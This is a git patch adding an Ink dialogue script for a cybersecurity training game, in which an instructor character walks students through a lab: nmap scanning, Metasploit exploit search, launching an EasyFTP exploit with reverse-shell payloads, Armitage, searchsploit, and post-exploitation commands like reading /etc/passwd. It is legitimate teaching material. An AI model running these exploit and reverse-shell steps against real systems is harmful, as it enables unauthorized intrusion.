From ab96da0731cab7320db4874cdcd9dfafa3918312 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Add GBL exploitation techniques lab sheet --- story_design/ink/lab_sheets/exploitation.ink | 893 +++++++++++++++++++ 1 file changed, 893 insertions(+) create mode 100644 story_design/ink/lab_sheets/exploitation.ink diff --git a/story_design/ink/lab_sheets/exploitation.ink b/story_design/ink/lab_sheets/exploitation.ink new file mode 100644 index 0000000..cf5056a --- /dev/null +++ b/story_design/ink/lab_sheets/exploitation.ink @@ -0,0 +1,893 @@ +// From Scanning to Exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/6_exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR exploitation_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques. + +~ instructor_rapport = 0 +~ exploitation_mastery = 0 + +Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. + +Exploitation Specialist: You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems. + +Exploitation Specialist: We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process. + +Exploitation Specialist: Remember: this knowledge is for authorized penetration testing and defensive security only. + +~ exploitation_mastery += 10 + +-> exploitation_hub + +=== exploitation_hub === +Exploitation Specialist: What aspect of exploitation would you like to explore? + ++ [Why combine scanning and exploitation?] + -> scanning_to_exploitation ++ [Scanning targets with Nmap] + -> nmap_scanning ++ [Metasploit database and scan import] + -> metasploit_database ++ [Running scans from within msfconsole] + -> msfconsole_scanning ++ [Searching for Metasploit exploits] + -> searching_exploits ++ [Launching Metasploit exploits] + -> launching_exploits ++ [Introduction to Armitage] + -> armitage_intro ++ [Using Armitage for automated hacking] + -> armitage_usage ++ [Vulnerability databases and research] + -> vulnerability_databases ++ [The Exploit Database and searchsploit] + -> exploit_db ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== scanning_to_exploitation === +Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work. + +~ instructor_rapport += 5 + +Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security? + +Exploitation Specialist: Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information. + ++ [What makes a target exploitable?] + Exploitation Specialist: A target is exploitable when it's running vulnerable software that you have an exploit for. + + Exploitation Specialist: For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system. + + Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack. + + ~ instructor_rapport += 5 + ++ [How do I know what attacks will work?] + Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in. + + Exploitation Specialist: After scanning reveals "Windows 2000 with EasyFTP 1.7.0.11," you can search for known vulnerabilities in those specific versions. + + Exploitation Specialist: Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number. + + Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== nmap_scanning === +Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running. + +~ instructor_rapport += 5 + +Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows. + +Exploitation Specialist: A comprehensive scan would be: nmap -sV 10.X.X.2-3 + +Exploitation Specialist: Where X.X are the second and third octets of your Kali VM's IP address. + ++ [What should I look for in the scan results?] + Exploitation Specialist: Pay attention to several key pieces of information: + + Exploitation Specialist: First, the IP addresses - which host is Linux and which is Windows? + + Exploitation Specialist: Second, what services are running - HTTP, FTP, SSH, IRC? + + Exploitation Specialist: Third, and most importantly, what specific software versions are running. For example: "vsftpd 2.3.4" or "EasyFTP 1.7.0.11" + + Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits. + + ~ instructor_rapport += 5 + ++ [What if the scan takes too long?] + Exploitation Specialist: Windows scans can take several minutes to complete - this is normal. + + Exploitation Specialist: If you want faster results, you can skip OS detection or scan fewer ports. + + Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port. + + ~ instructor_rapport += 5 + ++ [What if nmap shows ftp with a question mark?] + Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification. + + Exploitation Specialist: This can happen if the service is slow to respond or behaving unusually. + + Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== metasploit_database === +Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities. + +~ instructor_rapport += 5 + +Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services. + +Exploitation Specialist: Before using the database, you need to initialize it and start PostgreSQL. + ++ [How do I initialize the Metasploit database?] + Exploitation Specialist: First, reinitialize the database: sudo msfdb reinit + + Exploitation Specialist: Then start PostgreSQL: sudo service postgresql start + + Exploitation Specialist: These commands set up the database that Metasploit will use to store scan results and track compromised hosts. + + Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM. + + ~ instructor_rapport += 5 + ++ [How do I import Nmap scan results?] + Exploitation Specialist: If you've saved Nmap results in XML format, you can import them: + + Exploitation Specialist: From msfconsole, run: db_import scan_output.xml + + Exploitation Specialist: Metasploit will parse the XML and populate the database with host and service information. + + Exploitation Specialist: You can then query this data with commands like "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [What can I do with the database?] + Exploitation Specialist: Once data is in the database, you can query it intelligently: + + Exploitation Specialist: "hosts" shows all discovered hosts and their operating systems. + + Exploitation Specialist: "services" shows all discovered services across all hosts. + + Exploitation Specialist: "services -p 21" shows only services on port 21 (FTP). + + Exploitation Specialist: "services -p 21 -R" does the same AND automatically sets RHOSTS to target those services! + + Exploitation Specialist: This integration makes targeting much more efficient. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== msfconsole_scanning === +Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal. + +~ instructor_rapport += 5 + +Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET + +Exploitation Specialist: Even better, you can use db_nmap which scans AND automatically imports results into the database. + ++ [What's the difference between nmap and db_nmap?] + Exploitation Specialist: When you run "nmap" from msfconsole, it just executes Nmap normally. You'd need to manually import the results. + + Exploitation Specialist: When you run "db_nmap", it does the same scan BUT automatically imports results into the Metasploit database. + + Exploitation Specialist: For example: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [Does Metasploit have its own scanners?] + Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap. + + Exploitation Specialist: You can see them with: use auxiliary/scanner/portscan/ (then press TAB) + + Exploitation Specialist: For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning. + + ~ instructor_rapport += 5 + ++ [How do I use Metasploit's port scanner?] + Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: Set the target: set RHOSTS TARGET_IP + + Exploitation Specialist: Optionally speed it up: set THREADS 10 + + Exploitation Specialist: Then run it: run + + Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== searching_exploits === +Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more. + +Exploitation Specialist: The basic syntax is: search + +Exploitation Specialist: But you can be much more specific with search operators. + ++ [What search operators are available?] + Exploitation Specialist: Here are the main search operators: + + Exploitation Specialist: type: - Specify module type (exploit, auxiliary, post) + + Exploitation Specialist: platform: - Specify platform (Windows, Linux, etc.) + + Exploitation Specialist: cve: - Search by CVE number + + Exploitation Specialist: name: - Search module names + + Exploitation Specialist: For example: search type:exploit platform:Windows + + Exploitation Specialist: Or: search type:exploit cve:2003-0352 + + ~ instructor_rapport += 5 + ++ [How do I search for specific software?] + Exploitation Specialist: Simply include the software name in the search: + + Exploitation Specialist: search easyftp + + Exploitation Specialist: search vsftpd + + Exploitation Specialist: search unreal + + Exploitation Specialist: Metasploit will search module names, descriptions, and references for matches. + + Exploitation Specialist: Look through the results for modules that match your target's version number. + + ~ instructor_rapport += 5 + ++ [Give me some search examples] + Exploitation Specialist: Sure! Here are useful searches: + + Exploitation Specialist: search type:exploit platform:linux + + Exploitation Specialist: search type:exploit cve:2018 + + Exploitation Specialist: search buffer overflow + + Exploitation Specialist: search type:exploit platform:Windows XP + + Exploitation Specialist: search IRC (to find IRC server exploits) + + Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== launching_exploits === +Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow. + +~ instructor_rapport += 5 + +Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack. + +Exploitation Specialist: Let's walk through a typical exploitation scenario. + ++ [Walk me through exploiting EasyFTP] + Exploitation Specialist: Let me guide you through the complete process: + + Exploitation Specialist: First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: Check required options: show options + + Exploitation Specialist: Set the target: set RHOST TARGET_IP + + Exploitation Specialist: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: Set your IP for the reverse shell: set LHOST YOUR_KALI_IP + + Exploitation Specialist: Optionally check if it's vulnerable: check (though most don't support this) + + Exploitation Specialist: Launch the attack: exploit + + Exploitation Specialist: If successful, you'll get a shell on the target! + + ~ instructor_rapport += 5 + ++ [What payloads should I use?] + Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports. + + Exploitation Specialist: You can see compatible payloads with: show payloads + + Exploitation Specialist: For Windows targets, common choices include: + + Exploitation Specialist: windows/shell/reverse_tcp - Basic command shell + + Exploitation Specialist: windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features + + Exploitation Specialist: For Linux targets: + + Exploitation Specialist: cmd/unix/reverse - Simple Unix shell + + Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux + + ~ instructor_rapport += 5 + ++ [What if the exploit doesn't work?] + Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses. + + Exploitation Specialist: Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST. + + Exploitation Specialist: Try restarting the target VM - sometimes services crash after failed exploit attempts. + + Exploitation Specialist: Verify the target is actually running the vulnerable software at that version. + + Exploitation Specialist: Some exploits are unreliable and may need multiple attempts. + + ~ instructor_rapport += 5 + ++ [What can I do once I have a shell?] + Exploitation Specialist: With a Windows shell, you can run commands like: + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check your privileges) + + Exploitation Specialist: For Linux shells: + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (check current user) + + Exploitation Specialist: We'll cover post-exploitation in more depth in later labs. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_intro === +Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features. + +~ instructor_rapport += 5 + +Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing. + +Exploitation Specialist: Armitage can scan networks, automatically suggest attacks, and visualize compromised systems. + ++ [How is Armitage different from msfconsole?] + Exploitation Specialist: Msfconsole is a command-line interface that gives you complete control and flexibility. + + Exploitation Specialist: Armitage provides a graphical interface that visualizes the network and automates finding attacks. + + Exploitation Specialist: Armitage can look at scan results and automatically suggest which exploits might work against each target. + + Exploitation Specialist: It's particularly useful for beginners or when you want to quickly test multiple targets. + + Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed. + + ~ instructor_rapport += 5 + ++ [How do I start Armitage?] + Exploitation Specialist: First, initialize the Metasploit database if you haven't already: + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: Then start Armitage: armitage & + + Exploitation Specialist: The & runs it in the background so you can continue using your terminal. + + Exploitation Specialist: Leave the connection options as default and click "Connect" + + Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server. + + ~ instructor_rapport += 5 + ++ [What does the Armitage interface show?] + Exploitation Specialist: Armitage displays a visual network map showing discovered hosts. + + Exploitation Specialist: Each host is represented by an icon - the icon shows the detected operating system. + + Exploitation Specialist: Compromised systems are shown in red with lightning bolts. + + Exploitation Specialist: You can right-click hosts to see suggested attacks, launch exploits, or interact with shells. + + Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_usage === +Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets. + +~ instructor_rapport += 5 + +Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow. + ++ [How do I scan with Armitage?] + Exploitation Specialist: Click the "Hosts" menu, select "Nmap Scan", then choose a scan type. + + Exploitation Specialist: "Quick Scan (OS detect)" is a good starting point: nmap -O -sV TARGET + + Exploitation Specialist: Enter the IP address to scan and Armitage will run Nmap. + + Exploitation Specialist: Results are automatically imported into the Metasploit database and displayed visually. + + Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically. + + ~ instructor_rapport += 5 + ++ [How does Armitage suggest attacks?] + Exploitation Specialist: Armitage analyzes the operating system and services detected on each host. + + Exploitation Specialist: First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor + + Exploitation Specialist: Then click: Attacks → Find attacks + + Exploitation Specialist: Armitage will match detected services to available exploits in Metasploit. + + Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service. + + ~ instructor_rapport += 5 + ++ [How do I launch an attack in Armitage?] + Exploitation Specialist: Right-click the target host and select "Attack" + + Exploitation Specialist: Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret + + Exploitation Specialist: Click "Launch" and Armitage will configure and run the exploit. + + Exploitation Specialist: If successful, the host icon turns red showing it's compromised! + + Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules. + + ~ instructor_rapport += 5 + ++ [How do I interact with a compromised system?] + Exploitation Specialist: Right-click the compromised (red) host. + + Exploitation Specialist: Look for "Meterpreter 1" or "Shell 1" depending on the payload used. + + Exploitation Specialist: Click "Interact" → "Command shell" to open a terminal. + + Exploitation Specialist: You can now run commands like "dir" on Windows or "ls" on Linux. + + Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== vulnerability_databases === +Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about. + +~ instructor_rapport += 5 + +Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available. + +Exploitation Specialist: Different databases have different focuses and information, so it's worth checking multiple sources. + ++ [What are the main vulnerability databases?] + Exploitation Specialist: Here are the most important ones: + + Exploitation Specialist: CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations. + + Exploitation Specialist: NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository. + + Exploitation Specialist: SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums. + + Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories. + + ~ instructor_rapport += 5 + ++ [What information do these databases provide?] + Exploitation Specialist: Vulnerability databases typically include: + + Exploitation Specialist: CVE numbers - unique identifiers for each vulnerability. + + Exploitation Specialist: Severity scores (CVSS) - numerical ratings of how serious the vulnerability is. + + Exploitation Specialist: Affected versions - which specific software versions are vulnerable. + + Exploitation Specialist: Technical descriptions of the vulnerability. + + Exploitation Specialist: References to patches, advisories, and sometimes proof-of-concept code. + + Exploitation Specialist: Information about whether exploits exist in the wild. + + ~ instructor_rapport += 5 + ++ [Do all vulnerabilities have CVEs?] + Exploitation Specialist: No! This is an important point. + + Exploitation Specialist: CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs. + + Exploitation Specialist: Sometimes researchers publish vulnerabilities before CVEs are assigned. + + Exploitation Specialist: Some vendors have their own vulnerability identifiers. + + Exploitation Specialist: Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet. + + Exploitation Specialist: This is why checking multiple sources and forums is important. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== exploit_db === +Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code. + +Exploitation Specialist: Kali Linux includes a local copy of the entire database! + ++ [How do I search Exploit-DB online?] + Exploitation Specialist: Visit exploit-db.com and use their search function. + + Exploitation Specialist: You can search by software name, version, platform, or exploit type. + + Exploitation Specialist: Each exploit listing includes the source code, often in Python, C, PHP, or other languages. + + Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc. + + ~ instructor_rapport += 5 + ++ [How do I use the local Exploit-DB copy?] + Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/ + + Exploitation Specialist: They're organized by platform: windows, linux, osx, etc. + + Exploitation Specialist: You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv + + ~ instructor_rapport += 5 + ++ [What's searchsploit?] + Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy. + + Exploitation Specialist: It's much faster and more convenient than manually searching files. + + Exploitation Specialist: Basic usage: searchsploit easyftp + + Exploitation Specialist: You can also use grep on the CSV file: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 5 + ++ [How do I use standalone exploits from Exploit-DB?] + Exploitation Specialist: Standalone exploits often require some manual setup: + + Exploitation Specialist: You might need to edit the source code to set the target IP address. + + Exploitation Specialist: Some exploits require compilation (C/C++ code). + + Exploitation Specialist: Python exploits might need specific library dependencies. + + Exploitation Specialist: Read the exploit code comments carefully - they usually explain how to use it. + + Exploitation Specialist: Always understand what an exploit does before running it! + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== commands_reference === +Exploitation Specialist: Let me provide a comprehensive commands reference for this lab. + +~ instructor_rapport += 5 + +Exploitation Specialist: **Initial Scanning:** + +Exploitation Specialist: nmap -sV 10.X.X.2-3 (scan for two servers) + +Exploitation Specialist: nmap -O -sV -p 1-65535 TARGET (comprehensive scan) + +Exploitation Specialist: **Metasploit Database Setup:** + +Exploitation Specialist: sudo msfdb reinit + +Exploitation Specialist: sudo service postgresql start + +Exploitation Specialist: msfconsole (start Metasploit console) + ++ [Show me scanning from msfconsole] + Exploitation Specialist: **Scanning from Msfconsole:** + + Exploitation Specialist: msf > nmap -O -sV TARGET + + Exploitation Specialist: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: msf > db_import scan_output.xml + + Exploitation Specialist: **Database Queries:** + + Exploitation Specialist: msf > hosts (show all hosts) + + Exploitation Specialist: msf > services (show all services) + + Exploitation Specialist: msf > services -p 21 (show services on port 21) + + Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit scanning modules] + Exploitation Specialist: **Metasploit Port Scanners:** + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/ (TAB to see options) + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: msf auxiliary(tcp) > set RHOSTS TARGET + + Exploitation Specialist: msf auxiliary(tcp) > set THREADS 10 + + Exploitation Specialist: msf auxiliary(tcp) > run + + Exploitation Specialist: msf auxiliary(tcp) > services + + Exploitation Specialist: msf auxiliary(tcp) > back + + ~ instructor_rapport += 3 + ++ [Show me searching for exploits] + Exploitation Specialist: **Searching for Exploits:** + + Exploitation Specialist: msf > help search + + Exploitation Specialist: msf > search easyftp + + Exploitation Specialist: msf > search type:exploit platform:Windows + + Exploitation Specialist: msf > search type:exploit cve:2003-0352 + + Exploitation Specialist: msf > search buffer overflow + + Exploitation Specialist: msf > search type:exploit platform:linux + + Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret + + ~ instructor_rapport += 3 + ++ [Show me launching exploits] + Exploitation Specialist: **Launching Exploits:** + + Exploitation Specialist: msf > use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: msf exploit(...) > show options + + Exploitation Specialist: msf exploit(...) > set RHOST TARGET_IP + + Exploitation Specialist: msf exploit(...) > show payloads + + Exploitation Specialist: msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: msf exploit(...) > set LHOST YOUR_KALI_IP + + Exploitation Specialist: msf exploit(...) > check (if supported) + + Exploitation Specialist: msf exploit(...) > exploit + + ~ instructor_rapport += 3 + ++ [Show me post-exploitation commands] + Exploitation Specialist: **Post-Exploitation Commands (Windows):** + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check privileges) + + Exploitation Specialist: type C:\path\to\flag.txt (read file) + + Exploitation Specialist: **Post-Exploitation Commands (Linux):** + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (current user) + + Exploitation Specialist: cat flag (read flag file) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Exploitation Specialist: **Armitage Setup:** + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: armitage & + + Exploitation Specialist: **Armitage Workflow:** + + Exploitation Specialist: 1. Hosts → Nmap Scan → Quick Scan (OS detect) + + Exploitation Specialist: 2. Armitage → Set Exploit Rank → Poor + + Exploitation Specialist: 3. Attacks → Find attacks + + Exploitation Specialist: 4. Right-click host → Attack → select exploit → Launch + + Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell + + ~ instructor_rapport += 3 + ++ [Show me Exploit-DB commands] + Exploitation Specialist: **Exploit Database:** + + Exploitation Specialist: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: less /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: searchsploit easyftp + + Exploitation Specialist: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 3 + +- -> exploitation_hub + +=== challenge_tips === +Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges. + +~ instructor_rapport += 5 + +Exploitation Specialist: **Finding Vulnerable Services:** + +Exploitation Specialist: Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET + +Exploitation Specialist: Pay close attention to service versions - specific version numbers are key to finding exploits. + +Exploitation Specialist: Import results into Metasploit for easier targeting: db_nmap -sV TARGET + ++ [Tips for exploiting the Windows server?] + Exploitation Specialist: The Windows server is running EasyFTP with a known vulnerability. + + Exploitation Specialist: Search for it: search easyftp + + Exploitation Specialist: Look for the module ending in "cwd_fixret" + + Exploitation Specialist: Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp + + Exploitation Specialist: Make sure to set LHOST to YOUR Kali IP (the host-only network address). + + Exploitation Specialist: If the exploit fails, restart the Windows VM and try again. + + ~ instructor_rapport += 5 + ++ [Tips for exploiting the Linux server?] + Exploitation Specialist: The Linux server has multiple potentially vulnerable services. + + Exploitation Specialist: Scan all ports to find everything running: nmap -sV -p- TARGET + + Exploitation Specialist: Look for services like vsftpd, IRC, or other network services. + + Exploitation Specialist: Search Metasploit for exploits matching those services. + + Exploitation Specialist: Remember to use a Unix reverse shell payload: cmd/unix/reverse + + Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few. + + ~ instructor_rapport += 5 + ++ [Tips for using Armitage?] + Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically. + + Exploitation Specialist: Make sure you set the exploit rank to "Poor" or you'll miss some exploits. + + Exploitation Specialist: Don't just click the first suggested attack - read the module info to understand what it does. + + Exploitation Specialist: Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1. + + Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages. + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits. + + Exploitation Specialist: RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP. + + Exploitation Specialist: If services stop responding, restart the target VM - exploits often crash vulnerable services. + + Exploitation Specialist: After successfully exploiting a service once, you'll need to restart the VM to exploit it again. + + Exploitation Specialist: Be patient - some exploits take time to establish connections. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Exploitation Specialist: For the Windows server, look on a user's Desktop. + + Exploitation Specialist: Navigate with: cd C:\Users or cd C:\Documents and Settings + + Exploitation Specialist: List directories with: dir + + Exploitation Specialist: Read flag files with: type flag.txt + + Exploitation Specialist: For the Linux server, flags are typically in user home directories. + + Exploitation Specialist: Navigate with: cd /home + + Exploitation Specialist: List directories with: ls -la + + Exploitation Specialist: Read flags with: cat flag + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== ready_for_practice === +Exploitation Specialist: Excellent! You're ready to start practical exploitation. + +~ instructor_rapport += 10 +~ exploitation_mastery += 10 + +Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing. + +Exploitation Specialist: Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes. + +Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access. + ++ [Any final advice before I start?] + Exploitation Specialist: Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit. + + Exploitation Specialist: Don't rush. Take time to understand what each exploit does and why it works. + + Exploitation Specialist: If something doesn't work, check your settings, restart the target, and try again. + + Exploitation Specialist: Try both msfconsole and Armitage to see which you prefer. + + Exploitation Specialist: Most importantly: always verify you're targeting the right system and have authorization! + + Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test. + + ~ instructor_rapport += 10 + +- -> exploitation_hub + +-> END